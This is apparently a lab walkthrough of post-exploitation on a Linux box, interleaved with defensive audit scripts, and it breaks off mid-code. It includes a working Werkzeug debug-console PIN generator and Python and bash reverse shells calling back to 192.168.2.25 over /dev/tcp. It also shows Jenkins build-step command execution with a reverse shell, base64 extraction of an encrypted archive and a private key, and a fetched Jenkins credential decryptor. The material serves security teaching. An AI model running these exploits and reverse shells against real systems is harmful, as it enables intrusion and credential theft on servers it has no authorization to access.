
Post Exploitation

Ethical Exploitation Warning

Post-exploitation activities in this lab (e.g., privilege escalation, credential harvesting, lateral movement, persistence mechanisms, and data access) are explicitly authorized only within the defined lab environment.

In real-world systems, these actions can result in permanent data loss, service disruption, and legal consequences if performed without authorization. Ethical security professionals minimize impact, avoid unnecessary damage, and act strictly within scope.

This lab exists to teach how attackers operate after initial compromise so defenses can be designed and improved—not to normalize reckless behavior.

Post Enumeration

Post-enumeration is the critical step that takes place after gaining initial access to a remote server but before attempting privilege escalation. Once inside, we don’t rush into privesc blindly; instead, we carefully gather detailed information about the system to understand its environment, configurations, and potential weaknesses.

Key post-enumeration tasks include:

  • Checking the current user context and its permissions
  • Identifying operating system version and patch levels
  • Listing running processes and services
  • Examining installed software and kernel versions
  • Searching for misconfigurations, sensitive files, or stored credentials
  • Reviewing network connections and identifying trust relationships

This phase ensures we have a clear picture of the system’s landscape and helps us choose the right privilege escalation path instead of using random exploits, reducing the risk of detection or crashing the system.

Popular Post-Enumeration Tools

Linux: LinPEAS

LinPEAS is a popular script from the PEAS suite that automates local enumeration on Linux systems, looking for privilege escalation vectors (kernel exploits, SUID files, configs, misconfigurations, etc.).

  • Pros:
    • Fast and lightweight
    • Covers a wide range of checks (kernel, SUID, sudo, crons, passwords, services)
    • Color-coded, easy-to-read output
  • Cons:
    • Large output can be overwhelming
    • Can trigger alarms on defensive systems (e.g., EDR/AV)

Windows: WinPEAS

Part of the PEAS suite, WinPEAS is an automated script that scans Windows systems for common local privilege escalation vectors like misconfigured services, registry settings, permissions, tokens, and stored credentials.

  • Pros:
    • Very comprehensive (broad range of checks)
    • Color-coded, easy-to-read output
    • Active development with frequent updates
  • Cons:
    • Generates large, sometimes overwhelming output
    • Can trigger antivirus/EDR alerts

Summary Tip

  • If you want all-in-one scanning: LinPEAS / WinPEAS
  • If you want exploit suggestions: Windows Exploit Suggester or Sherlock
  • If you want PowerShell integration: PowerUp
  • If you want modular C# tooling: Seatbelt

Manual Info Gathering - Linux

Enumeration is the key to privilege escalation. Several helper scripts exist to assist with enumeration. Still, it is also important to understand what pieces of information to look for and to be able to perform your enumeration manually. When you gain initial shell access to the host, it is important to check several key details.

# Operating system and version
cat /etc/os-release
# List applications installed by dpkg
dpkg -l
# Current user's PATH and environment variables
echo $PATH
env
# Kernel version
uname -a
# Available shells
cat /etc/shells
# Network information
route
netstat -plant
ss -plant
arp -a
# List current processes
ps au
ps aux
ps aux | grep root
# Home directory contents
ls /home
# User's home directory contents
ls -la /home/james
# SSH directory contents
ls -l ~/.ssh
# Bash history
history
# Sudo - list user's privileges
sudo -l
# Passwd, groups, etc.
cat /etc/passwd
cat /etc/group
getent group sudo
# Cron jobs
cat /etc/cron*
crontab -l
# Find world-writable directories (the explicit -print keeps the pruned /proc out of the listing)
find / -path /proc -prune -o -type d -perm -o+w -print 2>/dev/null
# Find world-writable files
find / -path /proc -prune -o -type f -perm -o+w -print 2>/dev/null
# Find all hidden files, keeping those that mention james
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null | grep 'james'
# Find all hidden directories
find / -type d -name ".*" -ls 2>/dev/null
# Configuration files (patterns are quoted so the shell does not expand them first)
find / -type f \( -name "*.conf" -o -name "*.config" \) -exec ls -l {} \; 2>/dev/null
# Mounted file systems and drives
mount
cat /etc/fstab

Running LinPEAS

For this box, we’ll use LinPEAS to automate our post-enumeration on the compromised Linux server.

# Step 1: On the attacker machine, download the script directly from its GitHub repository
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
# Step 2: Serve it with a simple Python HTTP server on the attacker machine
python3 -m http.server 8000
# Step 3: Download the script on the target machine and execute it
wget http://<attacker-ip>:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Output of linpeas.sh

<SNIP>
╔══════════╣ Users with console
ashley:x:1007:1007:,,,:/home/ashley:/bin/bash
gitea:x:104:113::/var/lib/gitea:/bin/bash
james:x:1004:1004:,,,:/home/james:/bin/bash
jma:x:1000:1000:jma,,,:/home/jma:/bin/bash
kevin:x:1006:1006:,,,:/home/kevin:/bin/bash
kim:x:1008:1008:,,,:/home/kim:/bin/bash
lily:x:1005:1005:,,,:/home/lily:/bin/bash
myflask:x:999:994::/opt/Flask_SPA:/bin/bash
root:x:0:0:root:/root:/bin/bash

<SNIP>
╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-rw-rw- 1 www-data www-data 3201 Aug 22 06:45 /var/www/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress_db' );
define( 'DB_USER', 'wp_user' );
define( 'DB_PASSWORD', 'WpPassword123!' );
define( 'DB_HOST', 'localhost' );

<SNIP>
╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
Group administrator:
/home/kim
/home/kim/.local
/home/kim/.local/share
/home/kim/.local/share/nano
/home/kim/.profile
/home/kim/admin_monitor.py
/home/kim/.bash_logout
/home/kim/.bashrc

<SNIP>
╔══════════╣ Searching passwords in config PHP files
/var/www/joomla39/configuration.php: public $password = 'JoomlaPassword123!';
<SNIP>
/var/www/qdpm/core/cache/qdPM/prod/config/config_databases.yml.php: 'password' => 'QdpmPass123%21',

After executing LinPEAS, we identified several interesting items, including:

  • Potential privilege escalation vectors (e.g., SUID binaries)
  • Misconfigured permissions or sensitive files (such as the world-writable wp-config.php above)
  • Service configurations that may be exploitable, including database passwords stored in plaintext in the WordPress, Joomla and qdPM configuration files

These findings will guide our next steps as we prepare to attempt privilege escalation.
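Two of the LinPEAS findings above, service accounts with a login shell and a world-writable configuration file holding credentials, are easy to turn into repeatable checks a defender can run over exported output. The following Python is an added example, not part of the original write-up or of PEASS-ng: it parses passwd-style lines as printed under "Users with console" and `ls -l` lines as printed for wp-config.php. The sample lines are constructed to mirror the output above, and the uid cutoff for system accounts (below 1000) is an assumption based on the Debian convention.

```python
"""Offline triage of two LinPEAS findings: accounts with an interactive shell
and world-writable files that hold secrets.  Added example; all sample lines
are constructed to mirror the LinPEAS output in the write-up."""
import re

# Constructed sample: /etc/passwd-style lines as LinPEAS prints under "Users with console".
PASSWD_LINES = """\
ashley:x:1007:1007:,,,:/home/ashley:/bin/bash
gitea:x:104:113::/var/lib/gitea:/bin/bash
myflask:x:999:994::/opt/Flask_SPA:/bin/bash
root:x:0:0:root:/root:/bin/bash
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
""".splitlines()

# Constructed sample: `ls -l` lines as printed under "Analyzing Wordpress Files".
LS_LINES = [
    "-rw-rw-rw- 1 www-data www-data 3201 Aug 22 06:45 /var/www/wordpress/wp-config.php",
    "-rw-r----- 1 www-data www-data 3201 Aug 22 06:45 /var/www/joomla39/configuration.php",
    "drwxrwxrwx 2 root     root     4096 Aug 22 06:45 /tmp",
]

NOLOGIN = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync")
SYSTEM_UID_MAX = 999   # assumption: Debian convention, uids below 1000 are system accounts


def service_accounts_with_shell(lines):
    """Return (name, uid, shell) for system accounts (uid <= 999, not root)
    that still have an interactive shell.  gitea and myflask above are the
    kind of account that only needs a shell if someone really logs in as it."""
    hits = []
    for line in lines:
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if uid != 0 and uid <= SYSTEM_UID_MAX and shell not in NOLOGIN:
            hits.append((name, uid, shell))
    return hits


# type, mode, links, owner, group, size, month, day, time-or-year, path
LS_RE = re.compile(r"^([-dl])([rwx-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$")


def world_writable_files(lines, sensitive_names=("wp-config.php", "configuration.php", ".env")):
    """Return paths of regular files whose 'other' permission bits include
    write and whose basename is in sensitive_names.  The wp-config.php line
    above is the textbook case: any local user can read and rewrite the
    database credentials."""
    hits = []
    for line in lines:
        m = LS_RE.match(line)
        if not m:
            continue
        ftype, mode, _owner, _group, path = m.groups()
        other_write = mode[7] == "w"          # mode[6:9] are the 'other' bits
        if ftype == "-" and other_write and path.rsplit("/", 1)[-1] in sensitive_names:
            hits.append(path)
    return hits


if __name__ == "__main__":
    for name, uid, shell in service_accounts_with_shell(PASSWD_LINES):
        print(f"service account with shell: {name} (uid {uid}) -> {shell}")
    for path in world_writable_files(LS_LINES):
        print(f"world-writable secret file: {path}")
```

Both checks deliberately ignore the noisy parts of LinPEAS output and only report what a hardening ticket would act on: set the shell of unattended service accounts to nologin, and tighten wp-config.php to 0640 owned by the web server user.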

Werkzeug PIN Bypass - Continuation

After reading the Werkzeug documentation, the PIN exploit was developed by reversing the algorithm that generates the console PIN. Reviewing the __init__.py on the target machine, which the exploit script is based on, shows that the server is using SHA1 instead of MD5.

cat /opt/myflask/venv/lib/python3.11/site-packages/werkzeug/debug/__init__.py | grep hashlib

import hashlib
return hashlib.sha1(f"{pin} added salt".encode("utf-8", "replace")).hexdigest()[:12]
h = hashlib.sha1()

Let's again update the script and use sha1 instead of md5.

import hashlib
from itertools import chain

probably_public_bits = [
    'flask-admin',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', type(app).__name__)
    '/opt/myflask/venv/lib/python3.11/site-packages/flask/app.py'  # getattr(mod, '__file__', None)
]

private_bits = [
    '8796753406199',  # enp0s3 MAC, as a decimal integer string
    'ad4b9e2bc71a466398b19d0c256a378c'  # machine-id
]

# SHA1, matching the target's werkzeug/debug/__init__.py (the earlier version of this script used MD5)
h = hashlib.sha1()

for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

Our new pin is 130-883-207

PIN Correct

The PIN worked, and we now have access to an interactive console.

Werkzeug Console

Exploitation of Debug Console

As stated on the page, we can execute Python expressions in the context of the application. Let's use revshell to generate a Python reverse shell.

Rev Shell 2

Set up a listener, then execute the script in the console.

export RHOST="192.168.2.25";export RPORT=4443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Executing the script resulted in an invalid syntax error.

Console Error

Let's use a simple bash shell instead.

Revshell 3

import os; os.system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.2.25/4443 0>&1'")

The script worked. We now have a new shell in the context of the flask-admin user.

Listener Werkzeug

Jenkins Exploitation

Inside the home directory of the flask-admin user, we discovered a pcap file named capture. Let's download the file and open it in Wireshark.

Pcap

From the pcap file, we discovered the login credentials for the user ashley. Let's use them to try to log in to Jenkins.

Once we have gained access to a Jenkins application, a quick way of achieving command execution on the underlying server is via the Script Console, which allows us to run arbitrary Groovy scripts within the Jenkins controller runtime. This can be abused to run operating system commands on the underlying server. Here we take the equivalent route of a freestyle job with a shell build step.

Let's create a job by choosing New Item and then Freestyle project.

Jenkins 1

Under Build Triggers, click on Add build step, then select Execute shell. Input the id command and click on Save.

Jenkins 2

Now click on the Build Now option.

Jenkins 3

Under Build History, click on the build number that succeeded, then click on Console Output to see the command output. The id command executed without problem, and the uid is that of the ashley user.

Jenkins 4

Navigate to the project we created earlier and click on Configure.

Jenkins 5

Reverse shell as ashley

Let's generate a new command using revshell.com.

Jenkins 6

This Python one-liner is a reverse shell that connects the target system back to an attacker’s listener, providing remote command execution. It begins by importing three standard libraries: socket for network connections, subprocess for executing system-level commands, and os for handling low-level operations like file descriptor manipulation. The command then creates a TCP connection to the attacker’s machine at IP 10.0.0.12 on port 1234 using the socket.create_connection() method, which simplifies the connection process compared to manually setting up a socket.

Replace the id command with the code below.

Jenkins 7

Prepare the listener on our Kali machine, then save the job and click on the Build Now button.

nc -nlvp 8001

Jenkins 8

We have another reverse shell as ashley.

Jenkins 9
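The build-step route used above leaves a durable trace on the controller: the job's config.xml under JENKINS_HOME/jobs/<name>/ records the Execute shell command verbatim. The following Python is an added example for defenders, not part of the original write-up or of Jenkins: it scans freestyle job definitions for shell build steps and flags commands that look like reverse shells rather than builds. The two config.xml samples are constructed from the standard freestyle layout (project/builders/hudson.tasks.Shell/command), and the pattern list is an assumption about what a build step should never contain.

```python
"""Audit Jenkins freestyle job definitions for shell build steps that look like
reverse shells.  Added example; the job XML below is constructed from the
standard freestyle config.xml layout, not copied from a live controller."""
import re
import xml.etree.ElementTree as ET

# Constructed: two job definitions, one benign, one carrying a connect-back like the lab's.
SAMPLE_JOBS = {
    "nightly-build": """<project>
  <builders>
    <hudson.tasks.Shell>
      <command>make test</command>
    </hudson.tasks.Shell>
  </builders>
</project>""",
    "test": """<project>
  <builders>
    <hudson.tasks.Shell>
      <command>python3 -c 'import socket,subprocess,os;s=socket.create_connection(("10.0.0.12",1234))'</command>
    </hudson.tasks.Shell>
  </builders>
</project>""",
}

# Assumption: patterns that have no business in a build step (raw sockets, /dev/tcp,
# interactive bash, netcat with -e, pty spawning).
SUSPICIOUS = [
    r"/dev/tcp/",
    r"\bbash -i\b",
    r"socket\.(create_connection|socket)\(",
    r"\bnc\b.*-e",
    r"pty\.spawn",
]


def shell_steps(config_xml):
    """Return the command text of every hudson.tasks.Shell build step in a job config.
    Jenkins writes an XML 1.1 declaration, which not every parser accepts, so it is
    stripped before parsing."""
    body = re.sub(r"^<\?xml[^>]*\?>\s*", "", config_xml)
    root = ET.fromstring(body)
    cmds = []
    for step in root.iter("hudson.tasks.Shell"):
        cmd = step.find("command")
        if cmd is not None and cmd.text:
            cmds.append(cmd.text.strip())
    return cmds


def flag_jobs(jobs):
    """Map job name -> list of (command, matched pattern) for suspicious shell steps.
    `jobs` maps a job name to the text of its config.xml."""
    findings = {}
    for name, xml_text in jobs.items():
        for cmd in shell_steps(xml_text):
            for pat in SUSPICIOUS:
                if re.search(pat, cmd):
                    findings.setdefault(name, []).append((cmd, pat))
                    break
    return findings


if __name__ == "__main__":
    for job, hits in flag_jobs(SAMPLE_JOBS).items():
        for cmd, pat in hits:
            print(f"[{job}] matched {pat!r}: {cmd}")
```

On a real controller the same function would be fed each jobs/*/config.xml; the more robust control is to keep build steps in version-controlled pipelines and restrict who may create or reconfigure freestyle jobs, since any such user has shell on the controller or its agents by design.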

Stabilizing the Shell

Let's upgrade our shell using python

python3 -c 'import pty; pty.spawn("/bin/bash")'

1. Background the process. Once the shell is spawned, you may notice that the interaction is not fully stable. Press CTRL + Z to temporarily background the process. This allows you to regain control of your host machine while keeping the spawned shell active on the target.

2. Adjust terminal line settings and resume the shell. To improve interactivity, adjust the terminal settings on your host machine by running:

stty raw -echo
fg

This places the shell back in the foreground with improved responsiveness.

3. Set the terminal emulator to xterm. For optimal compatibility, set the terminal type on the target machine:

export TERM=xterm

This ensures that applications running inside the shell interpret terminal features correctly.

Explanation

  • The pty module in Python is key to creating and managing pseudo-terminals, enabling more interactive control over spawned processes.
  • The pty.spawn() function links the target’s controlling terminal with the current process’s input and output, creating a smoother shell session.
  • The stty command modifies terminal settings:
    • stty raw activates raw mode, allowing input to be processed one character at a time.
    • stty -echo disables command echoing, preventing typed characters from being displayed twice.
  • The export TERM=xterm command sets the terminal emulator to xterm, ensuring compatibility with features such as clear screen, cursor movement, and text formatting.

In the home directory of ashley, we saw an interesting file named jenkins_secret.tar.gz.enc. It's an encrypted file. Before proceeding with post-enumeration, let's use base64 encoding to download the file.

ashley@keym4ker:~$ ls
// terminal output
jenkins_home jenkins_secret.tar.gz.enc

ashley@keym4ker:~$ file jenkins_secret.tar.gz.enc
// terminal output
file jenkins_secret.tar.gz.enc
jenkins_secret.tar.gz.enc: openssl enc'd data with salted password

Copy the base64 encoded content of each file to our Kali machine for decoding.

ashley@keym4ker:~$ md5sum jenkins_secret.tar.gz.enc
// terminal output
md5sum jenkins_secret.tar.gz.enc
0f40ac264c4cfbbcdca4ed951d1df3df jenkins_secret.tar.gz.enc

ashley@keym4ker:~$ cat jenkins_secret.tar.gz.enc | base64 -w 0;echo
// terminal output
cat jenkins_secret.tar.gz.enc | base64 -w 0;echo
<SNIP>

Decoding the file

echo "U2FsdGVkX1/SmkfuKYqm6/VyeFKjAo..." | base64 -d > jenkins_secret.tar.gz.enc

Re-compute the md5sum to check file integrity.

Jenkins Md5sum

The md5sum hashes match, confirming the file was transferred successfully to our Kali machine.

Post Enumeration Gathering as ashley

Since the file is encrypted, let's continue the post-enumeration on the target machine.

ashley@keym4ker:~$ for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

// terminal output
File extension: .conf
/run/tmpfiles.d/static-nodes.conf
<SNIP>

File extension: .config
/var/www/osticket/upload/web.config
/etc/manpath.config

File extension: .cnf
/etc/alternatives/my.cnf

<SNIP>

Searching for credentials in configuration files

ashley@keym4ker:~$ for i in $(find / -name "*.cnf" 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" "$i" 2>/dev/null | grep -v "\#";done
// terminal output
File: /usr/share/mysql/wsrep.cnf
File: /usr/share/ssl-cert/ssleay.cnf
<SNIP>
File: /etc/alternatives/my.cnf

Again, nothing stands out, so let's search for databases. No databases of interest were found.

ashley@keym4ker:~$ for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done
// terminal output
DB File extension: .sql
/var/www/osticket/upload/setup/inc/streams/core/install-mysql.sql

<SNIP>
/var/www/joomla39/administrator/components/com_banners/sql/install.mysql.utf8.sql

<SNIP>
/var/www/keym4ker/schema.sql
/var/www/qdpm/install/install.sql

<SNIP>

DB File extension: .db
/var/www/qdpm/core/data/sandbox.db
<SNIP>

Searching for scripts. A few were discovered, but let's move on.

ashley@keym4ker:~$ for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share";done
// terminal output
File extension: .py
/opt/myflask/app.py

File extension: .pyc
/opt/myflask/__pycache__/app.cpython-39.pyc

File extension: .pl
/var/www/osticket/upload/setup/scripts/automail.pl

File extension: .jar
/tmp/winstone8390624141246507573.jar

File extension: .c
/usr/include/X11/Xtrans/Xtransutil.c

File extension: .sh
/opt/tomcat/bin/startup.sh

Lastly, the tester searched for common files, and found an interesting private.pem located in /keys directory.

ashley@keym4ker:~$ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp* .gz .gzip .zip .7z .tar* .rar .war .jar .ear, pem");do echo -e "\nFile extension: " $ext; find / -name "*$ext" 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
// terminal output
File extension: .xls

File extension: .xls*

File extension: .xltx

File extension: .csv

File extension: .od*

File extension: .doc

File extension: .doc*

File extension: .pdf
/var/www/wordpress/wp-content/plugins/thecartpress/plugins/authorize.net/anet_php_sdk/License.pdf

File extension: .pot
/var/www/wp/wp-content/plugins/better-search-replace/languages/better-search-replace.pot

File extension: .pp*

File extension: .gz

File extension: .gzip

File extension: .zip
/srv/ftp/secret.zip

File extension: .7z

File extension: .tar*
/home/ashley/jenkins_secret.tar.gz.enc

File extension: .rar

File extension: .war
/opt/tomcat/webapps/revshell.war
/opt/tomcat/webapps/backup.war

File extension: .jar
/home/ashley/jenkins_home/war/executable/winstone.jar


File extension: .ear,

File extension: pem
/keys/private.pem

Discovery of /keys directory

The /keys directory contains two key files and a text file. From the looks of it, these keys were used by the user ashley to encrypt the tar.gz file we discovered earlier using public key cryptography.

ashley@keym4ker:~$ ls /keys
// terminal output
key.bin.enc private.pem encryption.txt

Let's transfer both files to our machine using base64.

ashley@keym4ker:/keys$ cat key.bin.enc | base64 -w 0;echo
// terminal output
cat key.bin.enc | base64 -w 0;echo
fq/+nFoBEW8Y3vEDOEaiRsS8uAFKGJ4uN7ykSXaInjBzKI/IJLBrE5zuL7dVzAg7dYDW7ZbKWTKmI+O+ZbI814FWClHUglat8YW0mPKnTek0u2hSBgVxKV1oxTQW2DBUiqNH2ff5/q1hq1e1KdwdSG7JzlciaqnRI+ymABw//5NDVct3PGLnYmph0uuTk6sysErj1Czmq+9c4IIpz66caD6hTPi6C041oFITL3jIgkcy9Vo05hwCKhOlqVvSOWBecLo0Ehsvgt6Mw4EdlSiO/5JezygN5GUyee31RcqDbM6geJaptqPxalilFD15JsQTrJ7Uzj2KMpNW1Kraoqswww==

ashley@keym4ker:/keys$ cat private.pem | base64 -w 0;echo
// terminal output
cat private.pem | base64 -w 0;echo
<SNIP>

Again, let's compute the md5sum for file integrity checking.

ashley@keym4ker:/keys$ md5sum key.bin.enc
// terminal output
md5sum key.bin.enc
64e9fff502052363ad2492ffef39c4cb key.bin.enc

ashley@keym4ker:/keys$ md5sum private.pem
// terminal output
md5sum private.pem
93e55ba7ad6faa0c6f5f729b50ca2de8 private.pem

Decoding the key.bin.enc in our Kali terminal.

Decoding key

Decoding private.pem.

Decoding PEM

Public Key Cryptography

From encryption.txt, we have an idea of how the user performed the encryption using a combination of symmetric and asymmetric encryption.

ashley@keym4ker:/keys$ cat encryption.txt
// terminal output
cat encryption.txt
Hey team,

Here are some quick instructions on encrypting files using both symmetric and asymmetric encryption:

// Generating a private RSA key
openssl genrsa -out private.pem 2048

// Extracting the public RSA key
openssl rsa -in private.pem -outform PEM -pubout -out public.pem

// Create a symmetric key
openssl rand -hex 64 > key.bin

// Encrypt the file with the symmetric key
openssl enc -aes-256-cbc -pbkdf2 -iter 100000 -salt -in <file> -out <file>.enc -pass file:key.bin

Let me know if you have any questions!

Ashley Madison

Let's perform the decryption process.

# First, decrypt the symmetric key with the private.pem file
openssl pkeyutl -decrypt -inkey private.pem -in key.bin.enc -out decrypted_key.bin
# Now we have the symmetric key
cat decrypted_key.bin
7626168018309ac8bdeeb24a7072613f02faa0ed16db94a9635ab92e2679f137deaec82a219d674cfaab68e006a55006d44b2a9d793bb5dda627f165d9806047
# Then use this key to decrypt jenkins_secret.tar.gz.enc
openssl enc -d -aes-256-cbc -pbkdf2 -iter 100000 -in jenkins_secret.tar.gz.enc -out jenkins_secret.tar.gz -pass file:decrypted_key.bin
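To see which artefact protects what in the hybrid scheme above, here is an added Python example, not from the original write-up, that drives the openssl CLI through the complete cycle: key pair, random symmetric key, AES-256-CBC bulk encryption, RSA wrapping of the symmetric key, and then the same two-step recovery performed above. encryption.txt never shows how key.bin became key.bin.enc; the example assumes `openssl pkeyutl -encrypt` with the public key, which is the counterpart of the `pkeyutl -decrypt` that recovers it. It needs the openssl binary on PATH, and the plaintext and file names are constructed.

```python
"""Round-trip the hybrid (envelope) encryption scheme from encryption.txt by
driving the openssl CLI.  Added example; assumes the symmetric key was wrapped
with `openssl pkeyutl -encrypt` using the public key, the step the note omits."""
import hashlib
import subprocess
import tempfile
from pathlib import Path


def run(*args):
    # Raise on any non-zero exit so a failed step cannot be mistaken for success.
    subprocess.run(["openssl", *args], check=True, capture_output=True)


def envelope_roundtrip(plaintext: bytes) -> dict:
    """Encrypt `plaintext` exactly as the note describes, then recover it the way
    the write-up does, and report whether each stage matched."""
    with tempfile.TemporaryDirectory() as d:
        p = Path(d)
        (p / "secret.txt").write_bytes(plaintext)

        # 1. Asymmetric key pair; private.pem is the one file that must stay secret.
        run("genrsa", "-out", str(p / "private.pem"), "2048")
        run("rsa", "-in", str(p / "private.pem"), "-pubout", "-out", str(p / "public.pem"))

        # 2. Random symmetric key, 64 bytes rendered as hex (as in the note).
        run("rand", "-hex", "-out", str(p / "key.bin"), "64")

        # 3. Bulk encryption: AES-256-CBC, key derived from the first line of key.bin via PBKDF2.
        run("enc", "-aes-256-cbc", "-pbkdf2", "-iter", "100000", "-salt",
            "-in", str(p / "secret.txt"), "-out", str(p / "secret.txt.enc"),
            "-pass", "file:" + str(p / "key.bin"))

        # 4. Wrap the symmetric key with the public key (assumed; encryption.txt leaves this out).
        run("pkeyutl", "-encrypt", "-pubin", "-inkey", str(p / "public.pem"),
            "-in", str(p / "key.bin"), "-out", str(p / "key.bin.enc"))

        # --- recovery, the same two commands used above with the lab's private.pem ---
        run("pkeyutl", "-decrypt", "-inkey", str(p / "private.pem"),
            "-in", str(p / "key.bin.enc"), "-out", str(p / "key.dec"))
        run("enc", "-d", "-aes-256-cbc", "-pbkdf2", "-iter", "100000",
            "-in", str(p / "secret.txt.enc"), "-out", str(p / "secret.dec"),
            "-pass", "file:" + str(p / "key.dec"))

        recovered = (p / "secret.dec").read_bytes()
        return {
            "key_matches": (p / "key.dec").read_bytes() == (p / "key.bin").read_bytes(),
            "recovered": recovered == plaintext,
            # The same integrity check the write-up does with md5sum, using SHA-256 here.
            "digest_ok": hashlib.sha256(recovered).hexdigest()
                         == hashlib.sha256(plaintext).hexdigest(),
        }


if __name__ == "__main__":
    print(envelope_roundtrip(b"constructed secret payload\n"))
```

The lab's /keys directory shows the failure mode of this design: private.pem sits beside key.bin.enc, so anyone who can read the directory recovers the symmetric key in one command and the RSA layer adds nothing. The private key belongs offline or at least under a passphrase. Note also that AES-CBC without a MAC gives no integrity guarantee on the ciphertext; the digest comparison the write-up performs after the base64 transfer is the only check that the file arrived intact.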

Privilege Escalation to root

Then, let's extract the archive in our terminal.

Jenkins Secret

└─$ cat credentials.xml
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@2.3.15">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey plugin="ssh-credentials@1.18.1">
<scope>GLOBAL</scope>
<id>584a41dd-0e83-419b-93fe-315c2d7f30c0</id>
<description></description>
<username>root</username>
<passphrase>{AQAAABAAAAAgR6wt0qEWLkj4lB6mCDiPaXZh3ZXcYAwcUR71kk4mnJ2zzJGlDl3vr0SSdVe23e1H}</passphrase>
<privateKeySource class="com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey$DirectEntryPrivateKeySource">
<privateKey>{<SNIP>}</privateKey>
</privateKeySource>
</com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey>
<com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
<scope>GLOBAL</scope>
<id>14f59246-75f6-4a94-921e-4fb9f212ddbe</id>
<description>Slave node credentials</description>
<username>trisha</username>
<password>{AQAAABAAAAAQ9l9lP5ifdP4aZM7+ArwT1dgW0S4mzGV9ikuDXV2VSc4=}</password>
</com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

We see that there are two stored secrets.

  • root user SSH Private key that is protected with a passphrase
  • user trisha

Since the files secrets/master.key, secrets/hudson.util.Secret, and credentials.xml were obtained, we can perform an offline decryption of the stored secrets for the users root and trisha.

└─$ cat secret/master.key
8d39248eed1956622f16f8fe9699832a05f59f7ea38fa2e161fd9483ebfaad1ab757385ec17fd93fb8d1855d4e18e0d0515d6cd3bf575b632ee43a28ccb15ab5ee186e000789ca02a1e56bc337dc2fb98e79fcaff6b8c07958ed279f491eed24a3e9123825cad57f60f3929f3b3d60490f35c0b8f513f59647c2de1f568133ba

We can use the script from this repo to decrypt the secrets. Let's download and run the script, providing the three files as arguments.

# Download the offline decryptor
wget https://raw.githubusercontent.com/gquere/pwn_jenkins/refs/heads/master/offline_decryption/jenkins_offline_decrypt.py

# Run the script, providing the three files as arguments
python3 jenkins_offline_decrypt.py master.key hudson.util.Secret credentials.xml
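Before handing credentials.xml to a decryptor, it is worth knowing what the file holds without touching any secret value; the same inventory is what a Jenkins administrator should be reviewing periodically. The following Python is an added example, not part of the original write-up, of Jenkins, or of the linked decryption script: it lists the credential entries from the credentials.xml shown above and flags those that are GLOBAL in scope and bound to a privileged account name. The XML is reproduced from the page with the private-key body replaced by a placeholder, and the list of privileged names is an assumption.

```python
"""Inventory a Jenkins credentials.xml without exposing secret values.
Added example; the XML is the one shown in the write-up with the private key
body replaced by a placeholder."""
import re
import xml.etree.ElementTree as ET

CREDENTIALS_XML = """<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@2.3.15">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey plugin="ssh-credentials@1.18.1">
          <scope>GLOBAL</scope>
          <id>584a41dd-0e83-419b-93fe-315c2d7f30c0</id>
          <description></description>
          <username>root</username>
          <passphrase>{AQAAABAAAAAgR6wt0qEWLkj4lB6mCDiPaXZh3ZXcYAwcUR71kk4mnJ2zzJGlDl3vr0SSdVe23e1H}</passphrase>
          <privateKeySource class="com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey$DirectEntryPrivateKeySource">
            <privateKey>{PLACEHOLDER-KEY-BODY-NOT-REPRODUCED}</privateKey>
          </privateKeySource>
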